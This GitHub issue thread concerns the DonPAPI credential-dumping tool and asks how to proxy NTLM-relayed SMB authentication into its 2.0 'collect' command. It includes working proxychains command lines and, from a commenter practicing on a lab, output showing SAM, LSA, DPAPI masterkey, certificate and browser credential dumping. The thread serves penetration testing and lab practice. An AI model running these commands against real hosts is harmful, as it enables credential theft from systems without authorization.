login-securite / DonPAPI

Dumping DPAPI credz remotely
GNU General Public License v3.0

Support for Proxied SMB Authentication Connections #76

Open mr-pmillz opened 1 month ago

mr-pmillz commented 1 month ago

Prior to version 2.0, it was possible to proxy smb relayed auth from ntlmrelayx.py to donpapi via the following syntax:

proxychains4 donpapi -o . -dc-ip <DCIP> -no-pass NETBIOSDOMAIN/USERNAME@10.10.10.10

^ This works properly as intended.

In the latest version since the 2.0 release, I haven't been able to figure out how to get this to work. I've tried syntax such as, but not limited to:

proxychains4 donpapi collect -d example.com --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect --dc-ip <DCIP> --no-pass -u 'NETBIOSDOMAIN/USERNAME' -t 10.10.10.10
proxychains4 donpapi collect -d NETBIOSDOMAIN --dc-ip <DCIP> --no-pass -u USERNAME -t 10.10.10.10

Is there a way in the latest version of donpapi for the collect sub-command to support proxied authentication?

vinsroman commented 1 day ago

Hey @mr-pmillz, I am practicing Game of Active Directory and was able to get it to run as proxychains donpapi collect -t 'TARGETIP' -u 'USERNAME' -d 'NETBIOSDOMAIN' --no-pass; however, even though the output shows the following:

[192.168.56.22] [+] Starting gathering credz
[192.168.56.22] [+] Dumping SAM
[192.168.56.22] [$] [SAM] Got 5 accounts
[192.168.56.22] [+] Dumping LSA
[192.168.56.22] [$] [LSA] (Unknown User):xxxXXXXxxxxXXXXX
[192.168.56.22] [+] Dumping User and Machine masterkeys
[192.168.56.22] [$] [DPAPI] Got 7 masterkeys
[192.168.56.22] [+] Dumping User Chromium Browsers
[192.168.56.22] [+] Dumping User and Machine Certificates
[192.168.56.22] [$] [Certificates] [SYSTEM] - VAGRANT - VAGRANT_3B1B828383EEA854.pfx
[192.168.56.22] [$] [Certificates] [SYSTEM] - SAN not found - SAN not found_B427A2FC1D1C57FC.pfx
[192.168.56.22] [+] Dumping User and Machine Credential Manager
[192.168.56.22] [+] Gathering recent files and desktop files
[192.168.56.22] [+] Dumping User Firefox Browser
[192.168.56.22] [+] Dumping MobaXterm credentials
[192.168.56.22] [+] Dumping MRemoteNg Passwords
[192.168.56.22] [+] Dumping User's RDCManager
[192.168.56.22] [+] Dumping SCCM Credentials

I see only one secret and 2 certs in the DonPAPI web GUI, and I should get more AFAIK.